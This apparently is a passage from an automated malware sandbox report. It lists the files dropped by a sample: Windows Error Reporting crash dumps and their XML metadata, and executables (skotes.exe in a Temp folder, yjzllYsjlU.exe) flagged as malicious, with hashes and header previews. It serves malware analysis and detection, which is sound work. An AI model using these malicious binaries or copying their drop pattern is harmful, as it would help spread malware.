                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.8.8.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4700
                  Entropy (8bit):4.4670069180601395
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYj1PYm8M4JgtFRd+q8vKOCvBlU1d:uIjfdI7j8Zi7VwSJkdKFCvBlU1d
                  MD5:84B4017E8B2CE9D56360ABFE533FB2F6
                  SHA1:B1D3E13BBB046639102448206BA970658E9D107E
                  SHA-256:8D962AC02EE5E12D60AC8ABA2FBEEA8B882F8B7133DD3FB9F4792708E116FFC7
                  SHA-512:D2AA437DA671B4496D719EDDFD5DF833E1A0E54C405C875F4FF47874D1B4BB710F75CD3414037D45C9CC97215333560B19314BFC24DB2327E90AE336E71288CF
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 08:33:04 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):80156
                  Entropy (8bit):2.0519938120060717
                  Encrypted:false
                  SSDEEP:384:GK45yE2dijZdf3iRTD688G8qJbmdDWZs:7Pj4jZdfyRT4TN
                  MD5:9606B114F6CBE3059BFF823DA870D767
                  SHA1:06E1B79878C5F6132452986F731373AC5BD1F3E7
                  SHA-256:CB611239356C71FF61559DB11316D264BC8CB73DA7A95665149A78283469328D
                  SHA-512:AC37DF4D1598005A6ADDC7490F4663B748E26C546874352653D5BF9A94ACEFE2021E6D2325EB52D948BD7B4026887F5FCB6B0E5145E216AD05B73C2375D27F93
                  Malicious:false
                  Preview:MDMP..a..... ..........f........................\...........d...|6..........T.......8...........T...........x...........................................................................................................eJ......l.......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6386
                  Entropy (8bit):3.721053033840181
                  Encrypted:false
                  SSDEEP:96:RSIU6o7wVetbzlu6eY+YznpFX+ay5aMOUW89bUusfpBGm:R6l7wVeJxu6j+YNUpBW89bUusfp8m
                  MD5:29C81D10A5330890688C44BF425F68D1
                  SHA1:47478C6126EB57C6661AB7A85645B9FA2D052D19
                  SHA-256:3810993248291138FF262BA6C18165D6A74CC99978C2373740B43EC16D2A1E6C
                  SHA-512:36DE75BAB96A98A4C8D4B69862781DB80296E3982A9C135B3DD2E6DDC3D7CC787E02AE2DFE03AF13E7D1E6AFE4B36D0BA18205840FB711C3BF7EFE802FEEB465
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.8.8.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4700
                  Entropy (8bit):4.468136381127326
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjA5Ym8M4JgtFHtyY+q8vKOCvBlU1d:uIjfdI7j8Zi7VDoJYyYKFCvBlU1d
                  MD5:74C36BBED408A01F6BC77A8B96DF4064
                  SHA1:2BE0513EADF8986D71F48CBDD74EADEB104F9D8B
                  SHA-256:BBD56F8444CE751631540AAA7E842E254CCEDE71639E6311FF70EC4E5D128FEB
                  SHA-512:9DD7DA8E42656987B7E5E5E2917191FB24DC1C4BDEF95E551FC89D625EEA1E58363E0EB5642DF87276486B6982043B240DCE7799689CC49D664427DF44F62F3C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:35 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):83438
                  Entropy (8bit):2.152855398022418
                  Encrypted:false
                  SSDEEP:384:KhGQ7CsbYtXilHpvRR2G4B0XpJ2XBQU22J3trgSKHY0bDyg:8GQe+NHpvRR34+XH2XbdOnDy
                  MD5:99F53E016AB4FD6F8681B308349C3C4C
                  SHA1:0B087876BCE834D46414805481CDB7E0E832F307
                  SHA-256:916496EE3380390BE9F03391E479E42FD02293BADB2387AC62D02ED2B80CE7D3
                  SHA-512:1B658B9A524DA66E5F89D4F1E00866B7D21D4F27B3812D521C76F70090B7CC6DA2158ADE95207C0A3B77F0FAE2EA050907AE83364B0AC8B6E6D92475DD217F50
                  Malicious:false
                  Preview:MDMP..a..... ..........f....................................<...|.......D...":..........`.......8...........T...........p"..~#......................................................................................................eJ......<.......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8412
                  Entropy (8bit):3.705624709832181
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnV6Iyu6Y2DzSUc3Vl/ggmfGUpB089bEQsfl15sm:R6lXJV6Iyu6Y+SUKVKgmfGCEjfl1n
                  MD5:E3EE1291A1E73912CFF6FA94958A40EC
                  SHA1:471937AE679CCCC9A642573682117A3FF97DA6DD
                  SHA-256:931D89901E2FA1221BC11B5BD9534A7742AF9B0AEEC2BF35267FB86D17DD6F3A
                  SHA-512:C2F8EFD937C7EF26337EB7987709C766797FE2D010DCD559CD5282EF2093B4CCBE2AFEC08ED12B9CAEA7B6DB708AA7BF98FE6F498B9BB7B62137CCFBB1133B2B
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.487463020123947
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjQYm8M4JAtFf+q8vdEvmZltId:uIjfdI7j8Zi7VMJ2KyvmZltId
                  MD5:20DCA7119676607F54AC67B346797B28
                  SHA1:2FF75E96F48453EB6A0BB7E061784F8502F2880F
                  SHA-256:41C3A3002984FF41FA4BB8F2ECD2F0102B9C289083E04C174F321C4DB8D46449
                  SHA-512:EBE67837B947EC2E08B092C8FBFA19331ADE3CE1E93F6E7E156E34960C1FF251D2A309B1D75604C8E55D64D77E6699C02D6479DA638A30CE8EC7C64164CCED03
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:36 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):87504
                  Entropy (8bit):2.267387670635011
                  Encrypted:false
                  SSDEEP:384:XBECsbYtXbjdHp3BmAVPQSLTZeb7VvIO/Beh6gX0WpJ2XBQUd8J3trgSKHcc1tsN:XBR+udHp3BF5Xeb/JWH2XmdO1tm
                  MD5:0DC29EDF988EDDA107D71386DF39555B
                  SHA1:71A4D4AEC038481F0F417FBAC754736D0179293E
                  SHA-256:65DC36667B06A9D60617AE1F10C7B949F7C8EFEE75BBCBBE9570858E4BC2B3C3
                  SHA-512:EEC9FABDB138926E7B49A27F6FD8408C68BE86B7F59A545731499522D7A559579FEB9DBF34F45474163369E130BDB7DBE7F8DEE4425164BD18CAC719AED8766C
                  Malicious:false
                  Preview:MDMP..a..... ..........f....................................<...|...........":..........`.......8...........T............"...3......................................................................................................eJ......<.......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8412
                  Entropy (8bit):3.705706485204823
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnY6IyKe6Y2DxSUc3Vl/ggmfGUpBw89bEQsfksm:R6lXJY6IyKe6Y8SUKVKgmfGuEjfG
                  MD5:A7D8EBEFF0A87ECC9489E7A49B5EBA38
                  SHA1:8AEEE9B95AE33259A4F10A601A97A628CF80D552
                  SHA-256:C0CA89FCA2C5EFA3246912C5F77C834BA51FE1563C41D2FDC4E9B5B1E8DC107F
                  SHA-512:BFB92DC0276D3C593F1497EE8634C7B7E3B9D54B9B1DFEDC40582B5214DBEFA815FDE2104018DB17954B952EF38D319056CF8A42F4B5C1DA8BA8BCDA3476DA41
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.4892275764429215
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjroYm8M4JAtFbZ+q8vdEvmZltId:uIjfdI7j8Zi7VMFJAKyvmZltId
                  MD5:C55BB75A3F25049917C2DA0272A9E196
                  SHA1:754A82A5624D4B84B5DC759C90BEF39C47C2BC88
                  SHA-256:7AC81C20449C1C57029E6EB335D6018F7F9D514713623745B2CCAAA9D5A34F4D
                  SHA-512:5AD6A8D6BBB0E3D40EB9766E49CE581CB2D9DA4D4E509A43E0D63ECC1AA411F0A96BEC6AD32F910938EEFCF5C69195E2405B469979824EF1A241CF28FADC427B
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8406
                  Entropy (8bit):3.703353932385977
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJnz626Y2DCSURVsPgmfGUpBT89bpQsfHjm:R6lXJz626YvSURVkgmfG3pjfa
                  MD5:E91A8A2F85CD82A01E412427C0720E4F
                  SHA1:A17EED4203ECDB2A6F04946F184D5B8859A2057B
                  SHA-256:12814FF616A3ACFAB7A9F1044AC269CAF42CEE68F539F0BE67FBDC49175ACFD9
                  SHA-512:895C074C94666CAFD514DEAECFBE448F0D212FCF52F06EE13BDA51A6F38A19598F02E6F21F1A9EEF6AF987BD08B309E6D137393C84FD4FD37BF615A93BC26F27
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:37 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):82896
                  Entropy (8bit):2.191806561818109
                  Encrypted:false
                  SSDEEP:384:/eYkab6HpVVj/K7w0WpiXBIUMReJ3trgSBHeCQoD7Wsj0:/7n2HpTT2WcvQedVUoD7JQ
                  MD5:354D9ED577898D0DDB2FF7F9D6FB7C97
                  SHA1:60C31B22399AAFD11CE2BD562D6D02F847A2E29C
                  SHA-256:F00B8423CF842AC5A0A69CC49E2F920CC82799BD762F208B5F78108C7B5EDC68
                  SHA-512:859BEE087C5880244C00221FC6FFB590F142043F5BBE101D43420CCEA775854C0F460D96E1E628B72F38351F71BDA6D5C09FFD2D96AB79C4FAA15F34B7A4F0CF
                  Malicious:false
                  Preview:MDMP..a..... ..........f........................P...........<...........4....:..........`.......8...........T...........8#... ..........$...........................................................................................eJ..............GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):417792
                  Entropy (8bit):6.853380651118473
                  Encrypted:false
                  SSDEEP:6144:UoNOSzvJBmrrouTffp1Zpc4vBiefz06GZGY76shkES75quT2T3:jOSlBmrMuT3BpcWVr06GAA1uTA
                  MD5:83BDD1B8845B4B966CE28F284868CE9F
                  SHA1:BEE0D6FF026D091538A8568EA3478A57FD0E1205
                  SHA-256:040A58A233DDF5F6BF49E3B5BD4A4FE5D8AE1D764E698B446CA08776863AAFC4
                  SHA-512:297C2BFA91B141FE6B64F0B8595738F29203717A0F580A369A4018EF59A39E2F6AB95851C32832AD71560E530E04EBB94FBC917DE14B2A2871C04DDDBC384E06
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 37%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..A.........`......`.)./..`...s....$..........`......`.-....`.*....Rich...........................PE..L...#I.d............................S8............@.................................*...........................................d.......P...............................................................@...............0............................text..."........................... ..`.rdata..............................@..@.data............^..................@....rsrc...P............Z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):417792
                  Entropy (8bit):6.853380651118473
                  Encrypted:false
                  SSDEEP:6144:UoNOSzvJBmrrouTffp1Zpc4vBiefz06GZGY76shkES75quT2T3:jOSlBmrMuT3BpcWVr06GAA1uTA
                  MD5:83BDD1B8845B4B966CE28F284868CE9F
                  SHA1:BEE0D6FF026D091538A8568EA3478A57FD0E1205
                  SHA-256:040A58A233DDF5F6BF49E3B5BD4A4FE5D8AE1D764E698B446CA08776863AAFC4
                  SHA-512:297C2BFA91B141FE6B64F0B8595738F29203717A0F580A369A4018EF59A39E2F6AB95851C32832AD71560E530E04EBB94FBC917DE14B2A2871C04DDDBC384E06
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 37%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..A.........`......`.)./..`...s....$..........`......`.-....`.*....Rich...........................PE..L...#I.d............................S8............@.................................*...........................................d.......P...............................................................@...............0............................text..."........................... ..`.rdata..............................@..@.data............^..................@....rsrc...P............Z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):417792
                  Entropy (8bit):6.853380651118473
                  Encrypted:false
                  SSDEEP:6144:UoNOSzvJBmrrouTffp1Zpc4vBiefz06GZGY76shkES75quT2T3:jOSlBmrMuT3BpcWVr06GAA1uTA
                  MD5:83BDD1B8845B4B966CE28F284868CE9F
                  SHA1:BEE0D6FF026D091538A8568EA3478A57FD0E1205
                  SHA-256:040A58A233DDF5F6BF49E3B5BD4A4FE5D8AE1D764E698B446CA08776863AAFC4
                  SHA-512:297C2BFA91B141FE6B64F0B8595738F29203717A0F580A369A4018EF59A39E2F6AB95851C32832AD71560E530E04EBB94FBC917DE14B2A2871C04DDDBC384E06
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 37%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..A.........`......`.)./..`...s....$..........`......`.-....`.*....Rich...........................PE..L...#I.d............................S8............@.................................*...........................................d.......P...............................................................@...............0............................text..."........................... ..`.rdata..............................@..@.data............^..................@....rsrc...P............Z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\yjzllYsjlU.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):429568
                  Entropy (8bit):7.128373889223928
                  Encrypted:false
                  SSDEEP:6144:b09eBWBilriEAtxeSMikAX9cCaQ0POiFNVqjzwFYGONlsah/rOd2A:b0ABN9CxeSMFQ0WiFLqjmONFh/rOdv
                  MD5:05B4B94FE502B06454E6FE20B6965C76
                  SHA1:BFA65DE4BBEA7BF16322882EB0CBB0909EFCF0DB
                  SHA-256:4A5C55CCDE112D37CACAC44E44B9DEA894299902F10A9C6CA4505B145019FDD1
                  SHA-512:04FDECB2F567D7268D171B1E4131DF618C2C2C6835ADEE13083D139CC6443D9868F5BD7CBAED1CC020F29C7BC8BF14B763012548C1E8FED152F4DC18083C413A
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 39%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........[..[..[..4.O.M..4.z.{..4.N.(..R.w.R..[....4.K.Z..4.~.Z..4.y.Z..Rich[..........................PE..L......e............................3.............@..................................1......................................t...d....@...|.................................................h....... ...@............... ............................text.............................. ..`.data....p.......^..................@....rsrc....|...@...~..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\yjzllYsjlU.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
